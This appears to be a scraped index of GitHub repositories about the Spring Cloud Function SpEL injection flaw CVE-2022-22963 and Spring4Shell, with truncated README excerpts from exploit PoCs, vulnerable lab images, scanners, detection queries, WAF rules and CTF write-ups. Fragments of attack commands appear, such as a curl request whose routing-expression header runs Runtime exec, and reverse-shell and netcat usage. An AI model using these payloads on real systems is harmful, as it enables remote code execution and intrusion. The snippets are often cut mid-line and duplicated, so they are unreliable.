CVE-2022-22963

Spring Cloud Function - SpEL Injection (CVE-2022-22963) cd spring-cloud-function-samples/function-sample-pojo && mvn clean package -DskipTests && java -jar target/function-sample-pojo-200RELEASEjar codeql database create spring-cloud-function-32X-DB -l java -j0 --search-path /path/to/codeql -c "

CVE-2022-22963 RCE PoC Minimal example to reproduce CVE-2022-22963 remote code execution in orgspringframeworkcloud:spring-cloud-function-core Exploit Run the server mvn spring-boot:run Make a request curl -X POST -H 'springcloudfunctionrouting-expression: T(javalangRuntime)getRuntime()exec("touch PWNED")' -d

Spring Cloud Function Vulnerable Application / CVE-2022-22963

Spring Cloud Function Vulnerability(CVE-2022-22963) Vulnerable Application to CVE-2022-22963 CVE-2022-22963 Exploit Demo CVE-2022-22963mp4 Build docker pull me2nuk/cves:2022-22963 docker run -it -p 8080:8080 --name=vuln me2nuk/cves:2022-22963 POC curl -X POST 0000:8080/functionRouter -H 

Spring Cloud Function Vulnerable Application / CVE-2022-22963

Spring Cloud Function Vulnerability(CVE-2022-22963) Vulnerable Application to CVE-2022-22963 CVE-2022-22963 Exploit Demo CVE-2022-22963mp4 Build docker pull me2nuk/cves:2022-22963 docker run -it -p 8080:8080 --name=vuln me2nuk/cves:2022-22963 POC curl -X POST 0000:8080/functionRouter -H 

CVE-2022-22963 RCE PoC in python

CVE-2022-22963: Spring4Shell RCE Exploit This is a python implemetation of Spring4Shell, CVE-2022-22963, affecting services running Spring Cloud Function <=316 (for 31x) and <=322 (for 32x) Example Usage: # serving testsh on local webserver $ cat testsh #!/bin/bash whoami > /tmp/rce

Hack the Box - Machine - Inject

Inject Hack the Box - Machine - Easy apphacktheboxcom/machines/Inject Machine IP: 1012924493 Recon I start all CTFs by running nmap to view open ports and include the flags for running default scripts (-sC) and probing open ports for service/version info (-sV) Port 22 is almost always useless until we have credentials, so let's start with opening Burp Sui

Exploit for CVE-2022-22963 remote command execution in Spring Cloud Function

Exploit for RCE in Spring Cloud (CVE 2022-22963) Exploit for CVE-2022-22963 remote command execution in Spring Cloud Function See for details about the vulnerability here and here PoC Run the netcat on your host: $ nc -lvnp 9001 Run the exploit (example) with default port 9001 on attacker host: $ /exploitsh sitecom 101014122 ---[Rev

CVE-2022-22963 Spring-Cloud-Function-SpEL_RCE_exploit

CVE-2022-22963 CVE-2022-22963 Spring-Cloud-Function-SpEL_RCE_漏洞复现 需要有Docker环境 启动漏洞环境方式1 git clone githubcom/RanDengShiFu/CVE-2022-22963git;cd CVE-2022-22963;bash Startsh 启动漏洞环境方式2 rm -rf CVE-2022-22963/;mkdir CVE-2022-22963/;cd CVE-2022-22963/;git clone githubcom/N1ce75

CVE-2022-22963 research

SpringCloudFunction-Research CVE-2022-22963 research 環境 vulfocus/spring-cloud-function-rce:latest 成因 Request Header 中 springcloudfunctionrouting-expression 參數解析問題，造成注入Payload攻擊。 Reference hosch3ngithubio/2022/03/26/SpringCloudFunction%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/ wwwkitploitcom/2022/03/spring-spel-0day-po

CVE-2022-22963 - Spring4shell To run the vulnerable SpringBoot application run this docker container exposing it to port 8080 Example: docker run -it -d -p 8080:8080 bobcheat/springboot-public Exploit Curl command: curl -i -s -k -X $'POST' -H $'Host: 19216812:8080' -H $'springcloudfunctionrouting-expression

Rust-based exploit for the CVE-2022-22963 vulnerability

CVE-2022-22963 Exploit This repository contains a Rust-based exploit for the CVE-2022-22963 vulnerability found in Spring Cloud Function versions 316, 322, and older unsupported versions The vulnerability allows remote code execution and access to local resources through a specially crafted Spring Expression (SpEL) used as a routing-expression Description In Spring Cloud

spring-cloud-function SpEL RCE复现环境Config files for my GitHub profile.

spring-cloud-function SpEL RCE 漏洞编号：CVE-2022-22963 一个用于Spring Cloud Function SpEL表达式注入的测试环境 可以使用idea自己编译，也可以下载 release 直接启动 java11 运行 java -jar spel-001-SNAPSHOTjar 启动 搭建完访问本地8080端口

Spring Cloud Function SPEL表达式注入漏洞（CVE-2022-22963）

Spring Cloud Function SPEL表达式注入漏洞（CVE-2022-22963） Spring框架为现代基于java的企业应用程序(在任何类型的部署平台上)提供了一个全面的编程和配置模型。 Spring Cloud 中的 serveless框架 Spring Cloud Function 中的 RoutingFunction 类的 apply 方法将请求头中的“springcloudfunctionrouting-expression”参

SpringCore-0day A Chinese security researcher user shared, and then deleted the information that by sending crafted requests to JDK9+ SpringBeans-using applications, under certain circumstances, that they can remotely: Modify the logging parameters of that application to achieve an arbitrary write Use the modified logger to write a valid JSP file that contains a webshell Use

SPeL-injection-study（CVE-2022-22963） 共分为环境搭建及漏洞复现、原理学习、POC编写三部分 一、环境搭建 IDEA新建spring initializr 这里生成jar包 在终端安装jdk11 java -jar jojoSPeL-001-SNAPSHOTjar 部署jar包 访问127001:8080验证 发送POC验证 POST /functionRouter HTTP/11 Host: 127001:8080 springcloudfunctionroutin

spring cloud function 一键利用工具! by charis 博客https://charis3306.top/

CVE-2022-22963 (spring cloud function sple rce) spring cloud function 一键利用工具! by charis 博客charis3306top/ 已打包为exe文件开箱即用 命令主题 usage: Spring-cloud-function-spel02exe [-h] --check CHECK [--route ROUTE] --url URL [--ip IP] [--port PORT] [--proxies PROXIES] [--cmd CMD] spring cloud function 一键利用工具! by charis 博客ht

This is a POC for CVE-2022-22963

CVE-2022-22963-Poc-Bearcules This is a POC for CVE-2022-22963 I wrote this in bash I am new to Scripting and this is my first Script Disclaimer >> I am not Responsible for any miss use or abuse when using this POC for learning and educational purposes only Thank You

Scan systems and docker images for potential spring4shell vulnerabilities. Will detect in-depth (layered archives jar/zip/tar/war and scans for vulnerable Spring4shell versions. Binaries for Windows, Linux and OsX, but can be build on each platform supported by supported Golang.

spring4shell-scanner This scanner will recursively scan paths including archives for spring libraries and classes that are vulnerable to CVE-2022-22965 and CVE-2022-22963 Currently the allow list defines non exploitable versions, in this case spring-beans 5318 and 5220 and spring cloud function context 323

Spring Cloud Function Vulnerability (CVE-2022-22963) RCE This is a python implemetation of Spring4Shell, CVE-2022-22963, affecting services running Spring Cloud Function <=316 (for 31x) and <=322 (for 32x) Combination of multiple POCs online Author: Randall Banner Date: 17/04/23 Description: Script creates shellsh in current directory, with a simple bash

First step we need to do is, recon PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 82p1 Ubuntu 4ubuntu05 (Ubuntu Linux; protocol 20) | ssh-hostkey: | 3072 caf10c515a596277f0a80c5c7c8ddaf8 (RSA) | 256 d51c81c97b076b1cc1b429254b52219f (ECDSA) |_ 256 db1d8ceb9472b0d3ed44b96c93a7f91d (ED25519) 8080/tcp open nagios-nsca Nagios NSCA |_http-title: Home

Spring Cloud Function SpEL - cve-2022-22963

Spring Cloud Function SpEL - cve-2022-22963 Build $ git clone githubcom/twseptian/cve-2022-22963git $ cd cve-2022-22963 $ docker build -t spring-spel-0day $ docker run -p 8080:8080 --name spring-spel-0day spring-spel-0day Payload springcloudfunctionrouting-expression:T(javalangRuntime)getRuntime()exec("ping -c5 172

CVE-2022-22963-Reverse-Shell-Exploit This is a Python script that exploits CVE-2022-22963, a remote code execution vulnerability in Spring Cloud Function that allows attackers to execute arbitrary code on a vulnerable server The exploit uses the vulnerable /functionRouter endpoint to execute a command on the target server Usage Install the required Python libraries by running

CVE-2022-22963 is a vulnerability in the Spring Cloud Function Framework for Java that allows remote code execution. This python script will verify if the vulnerability exists, and if it does, will give you a reverse shell.

CVE-2022-22963 Reverse Shell Exploit This is a Python script that exploits CVE-2022-22963, a remote code execution vulnerability in Spring Cloud Function that allows attackers to execute arbitrary code on a vulnerable server The exploit uses the vulnerable /functionRouter endpoint to execute a command on the target server Usage To use this exploit, simply run the script with

An exploit for the CVE-2022-22963 (Spring Cloud Function Vulnerability)

Exploit-for-CVE-2022-22963 Exploit using curl to get a reverse shell in vulnerable spring cloud environments This exploit abuses the functionRouter URI, by injecting code into the eval function of the Spring Framework through a post request with a header that gives us Remote Code Execution (RCE) Created by Henri Vlasic Linkedin Arthur Valverde Linkedin

{ Spring Core 0day CVE-2022-22963 }

Spring Core RCE - CVE-2022-22963 Following Spring Cloud, on March 29, another heavyweight vulnerability of Spring broke out on the Internet: Spring Core RCE The Circulating coding poc: The exploit has been uploaded as exppy The official Spring patch is also in active production Patch Links in Spring Production The vulnerability affects: jdk version 9 and above using Spri

CVE-2022-22963 Exploit Description In Spring Cloud Function versions 316, 322 and older unsupported versions, when using routing functionality it is possible for a user to provide a specially crafted SpEL as a routing-expression that may result in remote code execution and access to local resources more details can be found in the CVE-2022-22963 Detail Based on the PoC pr

CVE-2022-22963 PoC

CVE-2022-22963 CVE-2022-22963 PoC Slight modified for English translation and detection of githubcom/chaosec2021/Spring-cloud-function-SpEL-RCE/blob/main/Spel_RCE_POCpy By default whoami is executed on the target and a file vulnerabletxt is created with the URLs that are vulnerable More information at wwwcyberkendracom/2022/03/rce-0-day-exploit-found-in-

CVE-2022-22963 CVE-2022-22963 PoC Slight modified for English translation and detection of githubcom/chaosec2021/Spring-cloud-function-SpEL-RCE/blob/main/Spel_RCE_POCpy By default whoami is executed on the target and a file vulnerabletxt is created with the URLs that are vulnerable More information at wwwcyberkendracom/2022/03/rce-0-day-exploit-found-in-

Binaries for CVE-2022-22963

CVE-2022-22963 Remote Code Execution exploiting CVE-2022-22963 attacking Spring Cloud service Disclamier: This is for educational purposes only The author is not responsible for the use of this program Use under your own risk Usage /CVE-2022-22963 -h Usage: CVE-2022-22963 [OPTIONS] Application Options: -u, --target-url= Target/Host url where 'Spring Cloud�

CVE-2022-22963 CVE-2022-22963 PoC Slight modified for English translation and detection of githubcom/chaosec2021/Spring-cloud-function-SpEL-RCE/blob/main/Spel_RCE_POCpy By default whoami is executed on the target and a file vulnerabletxt is created with the URLs that are vulnerable Exploiting the vulnerability is quite easy to accomplish Here is reported the curl

A fully automated, reliable, and accurate scanner for finding Spring4Shell and Spring Cloud RCE vulnerabilities

spring4shell-scan A fully automated, reliable, and accurate scanner for finding Spring4Shell and Spring Cloud RCE vulnerabilities Features Support for lists of URLs Fuzzing for more than 10 new Spring4Shell payloads (previously seen tools uses only 1-2 variants) Fuzzing for HTTP GET and POST methods Automatic validation of the vulnerability upon discovery Randomized and n

spring4shell-scan A fully automated, reliable, and accurate scanner for finding Spring4Shell and Spring Cloud RCE vulnerabilities Features Support for lists of URLs Fuzzing for more than 10 new Spring4Shell payloads (previously seen tools uses only 1-2 variants) Fuzzing for HTTP GET and POST methods Automatic validation of the vulnerability upon discovery Randomized and n

Spring4Shell RCE Demo

Spring4Shell RCE Demo for CVE-2022-22965 Types of demo spring-mvc (with spring-boot) deployed as a war to Apache Tomcat spring-boot war with jsp, to be run as java -jar spring-boot jar without jsp, to be run as java -jar While the first spring-mvc in Apache Tomcat is vulnerable, the latter two types -- where spring-boot runs in Embedded Tomcat Servlet Container -- do not app

Advance Spring4Shell RCE Vulnerability Scanner.

S4SScanner Advance Spring4Shell RCE Vulnerability Scanner S4SScanner is advance Spring4Shell RCE CVE-2022-22965 Vulnerability scanner that can search every url and check for vulnerability Main Features Web Crawler Scan Spring4Shell RCE Documentation install git clone githubcom/thenurhabib/s4sscannergit cd s4sscanner p

Lazy SPL to detect Spring4Shell exploitation

Spring4Shell-Detection with Splunk Lazy SPL to detect CVE-2022-22965 - Spring4Shell & CVE-2022-22963 exploitation Find more awesome Threat Hunting SPL queries, including BPFDoor detection here Detecting & Responding to Spring4Shell with Splunk | Medium Read my write up here Detecting & Responding to Spring4Shell with Splunk | Medium Detection for Spring

spring4shell-scan A fully automated, reliable, and accurate scanner for finding Spring4Shell and Spring Cloud RCE vulnerabilities Features Support for lists of URLs Fuzzing for more than 10 new Spring4Shell payloads (previously seen tools uses only 1-2 variants) Fuzzing for HTTP GET and POST methods Automatic validation of the vulnerability upon discovery Randomized and n

Spring PetClinic Sample Application Lacework Vulnerability Scanner There are many steps involved in building and deploying a containerized application, a complete container image lifecycle approach is key to managing software supply chain risks The Lacework inline remote scanner allows you to integrate Lacework security capabilities deeply into your software supply chain wor

Spring4Shell Burp Scanner

S4S-Scanner Burp Extension Spring4Shell Burp Scanner Extension Passive Scanner: It scan for keywords for Spring Boot error pages Active Scanner: It initialize Burp Collaborator and test /functionRouter path of the URL without any harmful activity for CVE-2022-22963, upload only like a text file for CVE-2022-22965 You can use with BurpSuite Extender and Jython Made with bare

Created after the release of CVE-2022-22965 and CVE-2022-22963. Bash script that detects Spring Framework occurrences in your projects and systems, allowing you to get insight on versions used. Unpacks JARs and analyzes their Manifest files.

springhound Created after the release of CVE-2022-22965 and CVE-2022-22963 Bash script that detects Spring Framework occurrences in your projects and systems, allowing you to get insight on versions used Unpacks JARs and analyzes their Manifest files Usage: /springhoundsh root_directory

Reproducing spring rce vulnerability and nuclei template

Spring RCE This repository provide vulnerable applications to CVE-2022-22963 and CVE-2022-22965 Also, You can find nuclei templates to check vulnerabilities CVE-2022-22965 vulnerable application original repository: Spring4Shell-POC Download Repository git clone githubcom/justmumu/SpringShellgit Steps For CVE-2022-22965 $ cd &

This includes CVE-2022-22963, a Spring SpEL / Expression Resource Access Vulnerability, as well as CVE-2022-22965, the spring-webmvc/spring-webflux RCE termed "SpringShell".

Spring CVE This includes CVE-2022-22963, a Spring SpEL / Expression Resource Access Vulnerability, as well as CVE-2022-22965, the spring-webmvc/spring-webflux RCE termed "SpringShell" CVE-2022-22963 In Spring Cloud Function versions 316, 322 and older unsupported versions, when using routing functionality it is possible for a user to provide a specially crafted S

Spring4Shell Vulnerability Scanner for Windows

THIS SCRIPT IS PROVIDED TO YOU "AS IS" TO THE EXTENT PERMITTED BY LAW, QUALYS HEREBY DISCLAIMS ALL WARRANTIES AND LIABILITY FOR THE PROVISION OR USE OF THIS SCRIPT IN NO EVENT SHALL THESE SCRIPTS BE DEEMED TO BE CLOUD SERVICES AS PROVIDED BY QUALYS Direct Download Links githubcom/Qualys/spring4scanwin/releases/download/102/Spring4Scanzip Spring4Scanner D

try to determine if a host is vulnerable to SpringShell CVE‐2022‐22965 and CVE‐2022‐22963

check-springshell This tool will try to determine if the host it is running on is likely vulnerable to CVE-2022-22963, a SpEL / Spring Expression Resource Access Vulnerability, as well as CVE-2022-22965, the so-called "SpringShell" RCE vulnerability This works very similar to the check-log4 tool, whereby it traverses the filesystem looking for Java archives, cracks t

开源工具 SpringBoot-Scan 的GUI图形化版本，对你有用的话麻烦点个Star哈哈~ 注意：本工具内置相关漏洞的Exp，杀软报毒属于正常现象！ 新版本工具使用 python3 mainpy VulHub 漏洞测试环境搭建 git clone githubcom/vulhub/vulhubgit 安装Do

This enforces F5 WAF signatures for Spring4Shell and Spring Cloud vulnerabilities across all policies on a BIG-IP ASM device

f5-waf-enforce-sig-Spring4Shell This enforces signatures for the vulnerabilities Spring Framework (Spring4Shell) and Spring Cloud vulnerabilities CVE-2022-22965, CVE-2022-22950, and CVE-2022-22963 across all policies on a BIG-IP ASM device Overview This script enforces all signatures present in the list below related to the vulnerabilities Spring4Shell and Spring Cloud across

Everything I needed to understand what was going on with "Spring4Shell" - translated source materials, exploit, links to demo apps, and more.

springcore-0day-en These are all my notes from the alleged confirmed! 0day dropped on 2022-03-29 This vulnerability is commonly referred to as "Spring4Shell" in the InfoSec community - an unfortunate name that calls back to the log4shell cataclysm, when (so far), impact of that magnitude has not been demonstrated I hope this repository helps you assess the situation

Spring漏洞综合利用工具

Spring_All_Reachable 一款针对Spring漏洞框架进行快速利用的图形化工具 📝 TODO Spring Core RCE 支持更多类型内存马 支持内存马密码修改 🎬使用方法 Spring Cloud Gateway命令执行（CVE-2022-22947） 漏洞描述 Spring Cloud Gateway存在远程代码执行漏洞，该漏洞是发生在Sp

SpringScan 漏洞检测 Burp插件

SpringScan Burp 检测插件 支持检测漏洞 Spring Core RCE (CVE-2022-22965) Spring Cloud Function SpEL RCE (CVE-2022-22963) Spring Cloud GateWay SPEL RCE (CVE-2022-22947) 回连平台 Dnglog (默认) BurpCollaboratorClient Ceye Digpm 支持自定义回连平台 CVE-2022-22965 检测方法 利用条件 JDK9及其以上版本； 使⽤了Spring-beans包；

Sentinel_Analtic_Rules #Test_Emotet Related IP addresses Description While Emotet historically was a banking malware organized in a botnet, nowadays Emotet is mostly seen as infrastructure as a service for content delivery For example, since mid 2018 it is used by Trickbot for installs, which may also lead to ransomware attacks using Ryuk, a combination observed several times

A collection of Github gists.

awesome-gists Terraform AWS WAFv2 for Log4JRCE (CVE-2021-44228, CVE-2021-45046) and Spring4ShellRCE (CVE-2022-22963, CVE-2022-22965)

Spring漏洞综合利用工具

Spring_All_Reachable 一款针对Spring漏洞框架进行快速利用的图形化工具 📝 TODO Spring Core RCE 支持更多类型内存马 支持内存马密码修改 🎬使用方法 Spring Cloud Gateway命令执行（CVE-2022-22947） 漏洞描述 Spring Cloud Gateway存在远程代码执行漏洞，该漏洞是发生在Sp

fscan 最近更新 [+] 2022/6/30 poc添加 CVE-2021-21972-vmcenter-RCEyml CVE-2021-22005-vmcenter-upload-toRCEyml CVE-2022-22954-VMware-RCEyml CVE-2022-22963-Spring-SpEL-RCEyml [+] 2022/4/20 poc模块加入指定目录或文件 -pocpath poc路径,端口可以指定文件-portf porttxt,rdp模块加入多线程爆破demo, -br xx指定线程 [+] 2022/2/25 新增-m webonly,跳

针对SpringBoot的开源渗透框架，以及Spring相关高危漏洞利用工具

✈️ 一、工具概述 日常渗透过程中，经常会碰到Spring Boot搭建的微服务，于是就想做一个针对Spring Boot的开源渗透框架，主要用作扫描Spring Boot的敏感信息泄露端点，并可以直接测试Spring的相关高危漏洞。 于是，就写了这么一个工具：SpringBoot-Scan 【简称：“SB-Scan”（错乱】 后期�

Awesome-Redteam 【免责声明】本项目所涉及的技术、思路和工具仅供学习，任何人不得将其用于非法用途和盈利，不得将其用于非授权渗透测试，否则后果自行承担，与本项目无关。使用本项目前请先阅读 法律法规。 快速导航 攻防渗透常用命令 重要端口及服务速查 目录 Awesome-Redteam 快�

Vulnerabilidad RCE en Spring Framework vía Data Binding on JDK 9+ (CVE-2022-22965 aka "Spring4Shell")

CVE-2022-22965 aka "Spring4Shell" Vulnerabilidad RCE en Spring Framework vía Data Binding on JDK 9+ El objetivo es centralizar la mayor cantidad de información de público conocimiento hasta el momento de la vulnerabilidad y poder saber qué acciones tomar en tal caso ¿Mi aplicación es vulnerable? Las condiciones (AND) que se

🔒 An Awesome List of SpringShell/Spring4shell resources

😎 Awesome lists about all things related to #Spring4Shell #SpringShell A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding Spring Framework prior to versions 5220 and 5318 contains a remote code execution vulnerability known as Spring4Shell Spring Project Official Spring project on published CV

SBSCAN是一款专注于spring框架的渗透测试工具，可以对指定站点进行springboot未授权扫描/敏感信息扫描以及进行spring框架漏洞扫描与验证的综合利用工具。 [SBSCAN is a penetration testing tool focused on the spring framework that can scan springboot sensitive information/unauthorized for specified sites and scan and validate spring related vulnerabilities]

English README 常见问题解答 ✈️ 一、工具概述 SBSCAN：（spring框架渗透，这一个工具就够了，如果工具对你有用，快点个star🌟吧） SBSCAN是一款专注于spring框架的渗透测试工具，可以对指定站点进行springboot未授权扫描/敏感信息扫描以及进行spring相关漏洞的扫描与验证。 最全的敏感路径字

Vuln-Environments.

To Save Some Vuln-Environments Jackson-databind 反序列化漏洞(CVE-2017-7525&CVE-2017-17485) Spring Cloud Function SpEL 表达式注入漏洞(CVE-2022-22963) Spring Framework RCE(Spring4Shell)(CVE-2022-22965) Spring Security RegexRequestMatcher Auth-Bypass(CVE-2022-22978) Apache Commons-Configuration RCE(CVE-2022-33980) Fastjson 1280 反序列化漏洞

Awesome Splunk SPL hunt queries that can be used to detect the latest vulnerability exploitation attempts & subsequent compromise

Threat Hunting with Splunk Awesome Splunk SPL queries that can be used to detect the latest vulnerability exploitation attempts &, threat hunt for MITRE ATT&CK TTPs I'm including queries with regular expressions, so detection will be possible even if you haven't parsed the logs properly MITRE ATT&CK TTP & Detection Analytics TTP MI

Vuln-Environments.

To Save Some Vuln-Environments Jackson-databind 反序列化漏洞(CVE-2017-7525&CVE-2017-17485) Spring Cloud Function SpEL 表达式注入漏洞(CVE-2022-22963) Spring Framework RCE(Spring4Shell)(CVE-2022-22965) Spring Security RegexRequestMatcher Auth-Bypass(CVE-2022-22978) Apache Commons-Configuration RCE(CVE-2022-33980) Fastjson 1280 反序列化漏洞

一个攻防知识仓库

Awesome-Redteam 【免责声明】本项目所涉及的技术、思路和工具仅供学习，任何人不得将其用于非法用途和盈利，不得将其用于非授权渗透测试，否则后果自行承担，与本项目无关。使用本项目前请先阅读 法律法规。 快速导航 攻防渗透常用命令 重要端口及服务速查 Roadmap 目录 快速导航

Vuln-Environments.

To Save Some Vuln-Environments Jackson-databind 反序列化漏洞(CVE-2017-7525&CVE-2017-17485) Spring Cloud Function SpEL 表达式注入漏洞(CVE-2022-22963) Spring Framework RCE(Spring4Shell)(CVE-2022-22965) Spring Security RegexRequestMatcher Auth-Bypass(CVE-2022-22978) Apache Commons-Configuration RCE(CVE-2022-33980) Fastjson 1280 反序列化漏洞

强化fscan的漏扫POC库

fscan-POC 强化fscan的漏扫POC库 声明：该POC仅供于学习跟安全检测使用，如果违法&恶意操作，与本人无关！！！欢迎关注chaosec公众号 如果有师傅想加的漏洞POC可以公众号或者项目评论告诉我 一、使用说明： 将fscan项目拉取到本地，然后找到路径\fscan\WebScan\pocs\，将该项目的yml文件放�

强化fscan的漏扫POC库

fscan-POC 强化fscan的漏扫POC库 声明：该POC仅供于学习跟安全检测使用，如果违法&恶意操作，与本人无关！！！欢迎关注chaosec公众号 如果有师傅想加的漏洞POC可以公众号或者项目评论告诉我 一、使用说明： 将fscan项目拉取到本地，然后找到路径\fscan\WebScan\pocs\，将该项目的yml文件放�

Debug CVEs!

vulEnv All sourcecode and environment for CVE debug! Lists fastjson fastjson laravel CVE-2021-3129 shiro CVE-2016-4437 CVE-2020-13933 spring CVE-2022-22947 CVE-2022-22963 CVE-2022-22965 CVE-2022-22978 log4j cve-2021-44228 Template # CVE- ## Environment ## Run ## Breakpoints ## Reference

Hackthebox weekly boxes writeups.

HTB Write-ups             Last update: Mailroom 🐧*nix Box Difficulty Writeup Foothold Privesc Medium Agile LFI Chrome Debug Mode AND Sudoedit CVE-2023-22809 Easy armageddon Drupal property injection: Drupalgeddon 2 snap install with sudo Easy Backdoor WP-Plugin:eBook Download 11

Extension for Dynatrace App Sec Reporting

Dynatrace AppSec Powerup V15 Automated Security Reporting Utility for for Dynatrace Security Install Drag this folder to a directory of your choice With python and pip installed, run pip install -r requirementstxt in a command line started in this directory Features Built with log4j in mind, the remediator provides the ability to: Tag CVE's within a tenant Manage CVE&

A list for Spring Security

SpringSecurity A list for Spring Security Spring Projects CVE Vulnerability Types Spring Cloud Function CVE-2020-22979 DoS Spring Cloud Function CVE-2022-22963 SpEL Spring Cloud Netflix Hystrix Dashboard CVE-2021-22053 SpEL Spring Cloud Netflix Hystrix Dashboard CVE-2020-5412 SSRF Spring Cloud Gateway CVE-2022-22947 RCE Spring Cloud Config CVE-2019-3799 Directo

Name URL Nmap githubcom/nmap/nmap pspy githubcom/DominicBreuker/pspy enum4linux githubcom/CiscoCXSecurity/enum4linux BloodHound githubcom/BloodHoundAD/BloodHound BloodHound Python githubcom/fox-it/BloodHoundpy Vulnerability Analysis Name URL Sparta githubcom/SECFORCE/sparta nikto githubcom/sullo/nikto Web Applicati

OSCP Cheat Sheet Commands, Payloads and Resources for the Offensive Security Certified Professional Certification Since this little project get's more and more attention, I decided to update it as often as possible to focus more helpful and absolutely necessary commands for the exam Feel free to submit a pull request or reach out to me on Twitter for suggestions Every h

Methodology and scripts for the OSCP. Only valid and useful techniques for certification are included

Preparación para la OSCP - Metodología & Scripts Enumeración - Fase Inicial Metodogolia WEB Enumeración de directorios Enumeración de subdominios Enumeración de información Web LFI bypass-LFI wrappers-LFI RCE en LFI Log Poisoning mail php execution XXE Unrestricted File Upload SNMP enumeratión

Java漏洞导图，用于梳理自己的java安全知识栈

JavaVulnMap Java漏洞导图，用于梳理自己的java安全知识栈 应用层 OWASP Top 10 2021-Broken Access Control 2021-Cryptographic Failures 2021-Injection 2021-Insecure Design 2021-Security Misconfiguration 2021-Vulnerable and Outdated Components 2021-Identification and Authentication Failures 2021-Software and Data Integrity Failures 2021-Security Logging and Moni

pocsuite3 (共541个) 最近一次检查时间 2023-11-28 03:08:23 收集记录 文件名称 收录时间 ssh_burstpy 2023-11-28 03:08:18 initpy 2023-11-28 03:08:15 tomcat-ajp-ghostcat_all_lfipy 2023-11-28 03:08:14 CVE-2021-46422py 2023-11-28 03:08:14 CVE-2022-26134py 2023-11-28 03:08:14 ftp_burstpy 2023-11-28 03:08:08 telnet_burstpy 2023-11-28 03:08:0

一个漏洞利用工具仓库

Awesome-Exploit 【免责声明】本项目所涉及的技术、思路和工具仅供学习，任何人不得将其用于非法用途和盈利，不得将其用于非授权渗透测试，否则后果自行承担，与本项目无关。使用本项目前请先阅读 法律法规。 一个漏洞证明/漏洞利用工具仓库 不定期更新 部分漏洞对应POC/EXP详情可参�

OSCP Cheat Sheet Commands, Payloads and Resources for the OffSec Certified Professional Certification (OSCP) Since this little project get's more and more attention, I decided to update it as often as possible to focus more helpful and absolutely necessary commands for the exam Feel free to submit a pull request or reach out to me on Twitter for suggestions Every hel

OSCP Cheat Sheet Commands, Payloads and Resources for the OffSec Certified Professional Certification (OSCP) Since this little project get's more and more attention, I decided to update it as often as possible to focus more helpful and absolutely necessary commands for the exam Feel free to submit a pull request or reach out to me on Twitter for suggestions Every hel

OSCP Cheat Sheet

OSCP Cheat Sheet Commands, Payloads and Resources for the OffSec Certified Professional Certification (OSCP) Since this little project get's more and more attention, I decided to update it as often as possible to focus more helpful and absolutely necessary commands for the exam Feel free to submit a pull request or reach out to me on Twitter for suggestions Every hel

vulcat可用于扫描Web端常见的CVE、CNVD等编号的漏洞，发现漏洞时会返回Payload信息。部分漏洞还支持命令行交互模式，可以持续利用漏洞

vulcat English version(英文版本) 官方文档 (本工具随缘更新) 除了代码写得有亿点点烂, BUG有亿点点多, 有亿点点不好用, 等亿点点小问题以外，还是阔以的吧 vulcat是一个用于扫描web端漏洞的工具，支持WAF检测、指纹识别、POC扫描、自定义POC等功能 当vulcat发现问题时会输出漏洞信息、�

春秋云境靶场解题攻略

春秋云镜 CVE-2022-32991 Web Based Quiz System SQL注入 先注册后登录 eid存在漏洞 手工注入 猜字段数 eci-2zeiglmgxybklc8oz8s6cloudeci1ichunqiucom/welcomephp?q=quiz&step=2&n=1&t=10&eid=5b141f1e8399e' or 1=1 order by 5 --%20 所以存在5个字段 eci-2zeiglmgxybkl

一个Vulhub漏洞复现知识库

Vulhub-Reproduce 【免责声明】本项目所涉及的技术、思路和工具仅供学习，任何人不得将其用于非法用途和盈利，不得将其用于非授权渗透测试，否则后果自行承担，与本项目无关。使用本项目前请先阅读 法律法规。 Vulhub漏洞复现，不定时更新。感谢@Vulhub提供开源漏洞靶场。 0x01 项目导航

TOP all Top Top Top_Codeql TOP All bugbounty pentesting CVE-2022- POC Exp Things Table of Contents 2022 year top total 30 2021 year top total 30 2020 year top total 30 2019 year top total 30 2018 year top total 30 2017 year top total 30 2016 year top total 30 2015 year top total 30 2014 year top total 30 2013 year top total 30 2022 star name url des 961 CVE-2022-0847-

Penetration_Testing_POC 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享，作为笔记吧，欢迎补充。 请注意所有工具是否有后门或者其他异常行为，建议均在虚拟环境操作。 Penetration_Testing_POC 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone Web APP 提权辅助相关 PC tools-小工具集�

Table of Contents 2023 year top total 30 2022 year top total 30 2021 year top total 30 2020 year top total 30 2019 year top total 30 2018 year top total 30 2017 year top total 30 2016 year top total 30 2015 year top total 30 2014 year top total 30 2023 star updated_at name url des 422 2023-11-15T09:54:51Z qq-tim-elevation githubcom/vi3t1/qq-tim-elevation CVE-2

Table of Contents 2023 year top total 30 2022 year top total 30 2021 year top total 30 2020 year top total 30 2019 year top total 30 2018 year top total 30 2017 year top total 30 2016 year top total 30 2015 year top total 30 2014 year top total 30 2023 star updated_at name url des 422 2023-11-15T09:54:51Z qq-tim-elevation githubcom/vi3t1/qq-tim-elevation CVE-2

TOP all Top Top Top_Codeql TOP All bugbounty pentesting CVE-2022- POC Exp Things Table of Contents 2022 year top total 30 2021 year top total 30 2020 year top total 30 2019 year top total 30 2018 year top total 30 2017 year top total 30 2016 year top total 30 2015 year top total 30 2014 year top total 30 2013 year top total 30 2022 star name url des 988 CVE-2022-0847-

TOP all Top Top Top_Codeql TOP All bugbounty pentesting CVE-2022- POC Exp Things Table of Contents 2022 year top total 30 2021 year top total 30 2020 year top total 30 2019 year top total 30 2018 year top total 30 2017 year top total 30 2016 year top total 30 2015 year top total 30 2014 year top total 30 2013 year top total 30 2022 star name url des 975 CVE-2022-0847-

在公网收集的gobypoc+部分自己加的poc

Goby_POC POC 数量1319 更新时间 2023/7/29 00:31:11 在公网收集的gobypoc+部分自己加的poc 360 TianQing ccid SQL injectable 360 TianQing database information disclosure 3ware default password vulnerability 74CMS Resumephp Boolean SQLI 74CMS SQLi with Plus ajax common 74CMS SQLi with Plus weixin AceNet AceReporter Report component Arbitrary file download ACME mini

TOP All bugbounty pentesting CVE-2023- POC Exp RCE example payload Things

TOP all Top Top Top_Codeql TOP All bugbounty pentesting CVE-2022- POC Exp Things Table of Contents 2023 year top total 30 2022 year top total 30 2021 year top total 30 2020 year top total 30 2019 year top total 30 2018 year top total 30 2017 year top total 30 2016 year top total 30 2015 year top total 30 2014 year top total 30 2023 star updated_at name url des 422 202

